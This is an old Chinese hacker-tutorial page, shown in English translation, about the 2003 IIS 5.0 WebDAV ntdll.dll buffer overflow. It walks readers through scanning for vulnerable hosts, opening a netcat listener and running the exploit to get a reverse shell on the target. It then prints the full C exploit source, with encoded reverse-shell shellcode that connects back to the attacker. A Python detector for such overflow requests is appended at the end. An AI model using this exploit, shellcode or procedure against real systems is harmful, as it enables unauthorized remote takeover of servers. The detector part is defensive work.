Getting into a server with Microsoft's newest critical WebDAV remote buffer overflow vulnerability! (Method for the English version) | http://www.cshu.net




www.cshu.net  2003-4-2  fog rain village

              --------------------------------------------------------------------------------
Editor: Arab League spirit  Source: own compilation  Category: hacker tutorial  Date: 2003.03.31  Views (today/total): 1.77/777 million


This vulnerability can be exploited by a direct overflow to obtain the highest system privileges!!!!
Published: 2003-3-18
Release date: 2003-03-17
Update date: 2003-03-18
Affected systems:
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP3
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
This vulnerability was probably discovered by some expert as early as a year ago but was never announced; only when Microsoft recently published its security bulletin did everyone learn that such a vulnerability existed. Although WebDAV is the route by which the vulnerability is reached through IIS, the vulnerability itself is not created by IIS but by an API function inside ntdll.dll. In other words, every application that calls this API has the vulnerability. The full call chain of the vulnerability is:
IIS -> WebDAV -> kernel32!GetFileAttributesExW -> ntdll!RtlDosPathNameToNtPathName_U (overflow)
These days I have been following the news and the attack code for this vulnerability closely.
Everyone take note!! The attack code for the English version and the Chinese edition of Windows is completely different!!

Therefore the method is also different, and the success rate is certainly not very high.
Given the seriousness, for now only the attack code and method for the English version are published.
Tools needed:
the English-version overflow program (needless to say!)
(NC.EXE, which I don't need to tell you about!)
and the webdavscan scanner (available from Black and White)!
1. First use webdavscan to scan for hosts that have the hole (there are many, but the success rate is not high!)
2. Then nc -L -vv -p 666 (listens on port 666)
3. Run the compiled overflow program wb.exe <target IP> <your IP> 666 0-3, trying each padding
If you are lucky, connecting to port 666 with nc again drops you directly into the winnt directory on the target host. Do I still need to teach what comes next?
The reason the success rate is currently not high is that the code has only just come out and has not been perfected! (Perhaps that is a good thing!! Ha-ha!!)
The WebDAV overflow program (compiled):
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]         */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV.               */
/* run a netcat ex: nc -L -vv -p 666                               */
/* wb server.com your_ip 666 0                                     */
/* the shellcode is a reverse remote shell                         */
/* you need to pad a bit.. the best way I think is launching       */
/* the exploit with pad = 0 and after that, the server will be     */
/* down for a couple of seconds, now retry with pad at 1           */
/* and so on. pad 2.. pad 3.. if you havent the shell after        */
/* something like pad at 10 I think you better to restart from     */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but     */
/* on all the others servers it was at 2,3,4, etc. sometimes       */
/* you can have the force with you, and get the shell in 1 try     */
/* sometimes you need to pad more than 10 times;)                  */
/* the shellcode was coded by myself, it is SEH + ScanMem to       */
/* find the famous offsets (GetProcAddress)..                      */
/* I know I code like a pig, my english sucks, and my tech too     */
/* it is my first exploit. and my first shellcode. sorry:P         */
/* if you have comments feel free to mail me at:                   */
/* mailto: Kralor@coromputer.net                                   */
/* or visit us at www.coromputer.net. You can speak with us        */
/* at IRC undernet channel #coromputer                             */
/* ok now the greetz:                                              */
/* [El0d1e] to help me find some information about the bug:)       */
/* tuck_ to support me;)                                           */
/* and all my friends in coromputer crew! Hein les poulets! =)     */
/*******************************************************************/


#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* strlen, memset */
#pragma comment(lib, "ws2_32")

/* payload: a clear-text decoder stub followed by the body xored with 0x95;
   the trailing strings are the API names the shellcode resolves at run time,
   the reverse-connect sockaddr_in (patched below) and kernel32 base candidates */
char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd"              // dont change anything..
"\x00\x00\xe7\x77"  // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04"  // win2k3
"\x00\x00\xf7\xbf"  // win9x =P
"\xff\xff\xff\xff";
int test_host(char *host)
{
    char search[100] = "";
    int sock;
    struct hostent *heh;
    struct sockaddr_in hmm;
    char buf[100] = "";

    if (strlen(host) > 60) {
        printf("error: Victim host too long.\r\n");
        return 1;
    }
    if ((heh = gethostbyname(host)) == 0) {
        printf("error: Cant resolve %s", host);
        return 1;
    }
    /* a SEARCH without a body is answered "HTTP/1.1 411 Length Required"
       when the WebDAV extension is enabled; anything else means no WebDAV */
    sprintf(search, "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n", host);
    hmm.sin_port = htons(80);
    hmm.sin_family = AF_INET;
    hmm.sin_addr = *((struct in_addr *)heh->h_addr);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("error: Cant create socket");
        return 1;
    }
    printf("Checking WebDav on %s...", host);
    if ((connect(sock, (struct sockaddr *)&hmm, sizeof(hmm))) == -1) {
        printf("CONNECTING_ERROR\r\n");
        return 1;
    }
    send(sock, search, strlen(search), 0);
    recv(sock, buf, sizeof(buf), 0);
    if (buf[9] == '4' && buf[10] == '1' && buf[11] == '1')
        return 0;
    printf("NOT FOUND\r\n");
    return 1;
}

void help(char *program)
{
    printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n", program);
    return;
}

void banner(void)
{
    printf("\r\n\t[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]\r\n");
    printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
    return;
}

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    unsigned short port = 0;
    char *port_to_shell = "", *ip1 = "", data[50] = "";
    unsigned int i, j;
    unsigned int ip = 0;
    int s, PAD = 0x10;
    struct hostent *he;
    struct sockaddr_in crpt;
    char buffer[65536] = "";
    char request[80000]; // huuuh, what a mess! :)
    char content[] =
        "<?xml version=\"1.0\"?>\r\n"
        "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
        "<g:sql>\r\n"
        "Select \"DAV:displayname\" from scope()\r\n"
        "</g:sql>\r\n"
        "</g:searchrequest>\r\n";

    banner();
    if ((argc < 4) || (argc > 5)) {
        help(argv[0]);
        return 1;
    }
    if (WSAStartup(0x0101, &wsaData) != 0) {
        printf("error starting winsock..");
        return 1;
    }
    if (test_host(argv[1]))
        return 1;
    if (argc == 5)
        PAD += atoi(argv[4]);
    printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n", PAD, PAD);

    /* patch the reverse-connect address and port into the sockaddr_in
       embedded in the shellcode */
    ip = inet_addr(argv[2]); ip1 = (char *)&ip;
    shellc0de[448] = ip1[0]; shellc0de[449] = ip1[1];
    shellc0de[450] = ip1[2]; shellc0de[451] = ip1[3];
    port = htons(atoi(argv[3]));
    port_to_shell = (char *)&port;
    shellc0de[446] = port_to_shell[0];
    shellc0de[447] = port_to_shell[1];

    // we xor the shellcode [xored by 0x95 to avoid bad chars]
    // (the first 0x34 bytes are the decoder stub and stay in clear)
    __asm {
        lea eax, shellc0de
        add eax, 0x34
        xor ecx, ecx
        mov cx, 0x1b0
    wah:
        xor byte ptr [eax], 0x95
        inc eax
        loop wah
    }

    if ((he = gethostbyname(argv[1])) == 0) {
        printf("error: Cant resolve %s", argv[1]);
        return 1;
    }
    crpt.sin_port = htons(80);
    crpt.sin_family = AF_INET;
    crpt.sin_addr = *((struct in_addr *)he->h_addr);
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("error: Cant create socket");
        return 1;
    }
    printf("Connecting...");
    if ((connect(s, (struct sockaddr *)&crpt, sizeof(crpt))) == -1) {
        printf("ERROR\r\n");
        return 1;
    }

    // No Operation.
    for (i = 0; i < sizeof(buffer); buffer[i] = (char)0x90, i++);
    // fill the buffer with the shellcode
    for (i = 64000, j = 0; i < sizeof(buffer) && j < sizeof(shellc0de) - 1;
         buffer[i] = shellc0de[j], i++, j++);
    // well. it is not necessary..
    for (i = 0; i < 2500; buffer[i] = PAD, i++);
    /* we can simply put our ret in this 2 offsets.. */
    //buffer[2086]=PAD;
    //buffer[2085]=PAD;
    buffer[sizeof(buffer)] = 0x00;  // as in the original: terminator written one past the array
    memset(request, 0, sizeof(request));
    memset(data, 0, sizeof(data));
    sprintf(request, "SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",
            buffer, argv[1]);
    sprintf(request + strlen(request), "%d\r\n\r\n", strlen(content));
    printf("CONNECTED\r\nSending evil request...");
    send(s, request, strlen(request), 0);
    send(s, content, strlen(content), 0);
    printf("SENT\r\n");
    recv(s, data, sizeof(data), 0);
    if (data[0] != 0x00) {
        printf("Server seems to be patched.\r\n");
        printf("data: %s\r\n", data);
    } else
        printf("Now if you are lucky you will get a shell.\r\n");
    closesocket(s);
    return 0;
}
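A defender-side counterpart to the program above, added here as an example; it is not part of the original page and not kralor's code. It parses raw HTTP request lines and flags WebDAV verbs whose request-URI has the shape this exploit sends against IIS 5.0 (tens of kilobytes long, full of non-printable bytes, dominated by one repeated filler byte). The thresholds MAX_URI_LEN and RUN_LEN, the set of WebDAV verbs, and the sample requests at the bottom are assumptions and constructed data, not values taken from the page.

```python
"""Flag WebDAV requests whose request-URI looks like the overflow payload above.

Added example; assumed (not from the page): the two thresholds, the verb
list, and the constructed sample requests.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Verbs that IIS 5.0 hands to its WebDAV extension; plain GET/POST never
# reach the vulnerable path-conversion call.
WEBDAV_METHODS = {"SEARCH", "PROPFIND", "PROPPATCH", "LOCK", "UNLOCK",
                  "MKCOL", "COPY", "MOVE"}
MAX_URI_LEN = 1024   # assumed: legitimate DAV paths are far shorter
RUN_LEN = 64         # assumed: >= 64 identical bytes in a URI smells of a sled


@dataclass
class Finding:
    method: str
    uri_len: int
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_request_line(raw: bytes) -> Optional[Tuple[str, bytes, str]]:
    """Split the first line of a raw request into (method, uri, version).

    The URI stays as bytes because the exploit's URI is binary; the version is
    taken from the right so stray spaces inside the URI do not break parsing.
    """
    line = raw.split(b"\r\n", 1)[0]
    head, sep, version = line.rpartition(b" ")
    if not sep or not version.startswith(b"HTTP/"):
        return None
    method, sep, uri = head.partition(b" ")
    if not sep or not uri:
        return None
    return method.decode("ascii", "replace"), uri, version.decode("ascii", "replace")


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value (sled or padding)."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        if run > best:
            best = run
    return best


def inspect_request(raw: bytes) -> Finding:
    """Score one raw request; non-WebDAV verbs are returned unflagged."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return Finding("?", 0, ["unparseable request line"])
    method, uri, _version = parsed
    finding = Finding(method, len(uri))
    if method not in WEBDAV_METHODS:
        return finding
    if len(uri) > MAX_URI_LEN:
        finding.reasons.append(f"uri length {len(uri)} > {MAX_URI_LEN}")
    if any(b < 0x20 or b > 0x7E for b in uri):
        finding.reasons.append("non-printable bytes in uri")
    run = longest_run(uri)
    if run >= RUN_LEN:
        finding.reasons.append(f"run of {run} identical bytes in uri")
    return finding


# Constructed sample traffic (not captured from any real host).
BENIGN_GET = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
BENIGN_PROPFIND = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: www.example.com\r\n"
                   b"Depth: 1\r\n\r\n")
# Mirrors the layout the exploit above builds: 2500 bytes of return-address
# padding (0x10), 0x90 filler, a placeholder where the payload sits at offset
# 64000, 64 KB in total. No real shellcode is included.
_fake = b"\x10" * 2500 + b"\x90" * (64000 - 2500) + b"PLACEHOLDER-NOT-SHELLCODE"
_fake += b"\x90" * (65536 - len(_fake))
OVERFLOW_SEARCH = (b"SEARCH /" + _fake + b" HTTP/1.1\r\nHost: victim.example\r\n"
                   b"Content-type: text/xml\r\nContent-Length: 0\r\n\r\n")


def main() -> None:
    for raw in (BENIGN_GET, BENIGN_PROPFIND, OVERFLOW_SEARCH):
        f = inspect_request(raw)
        verdict = "ALERT" if f.suspicious else "ok"
        print(f"{verdict:5} {f.method:8} uri_len={f.uri_len:6} {'; '.join(f.reasons)}")


if __name__ == "__main__":
    main()
```

Run as a script, the constructed SEARCH request is reported on all three counts while the short GET and PROPFIND pass; inspect_request() can be pointed at request lines pulled from a proxy or IDS capture. Because a successful or failed attempt takes the IIS process down (the exploit header above says the server goes down for a couple of seconds), the request may never be written to the server's own log, so captures taken in front of the server are the more reliable place to look.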

If you are interested in exchanging ideas, my QQ is 56690223




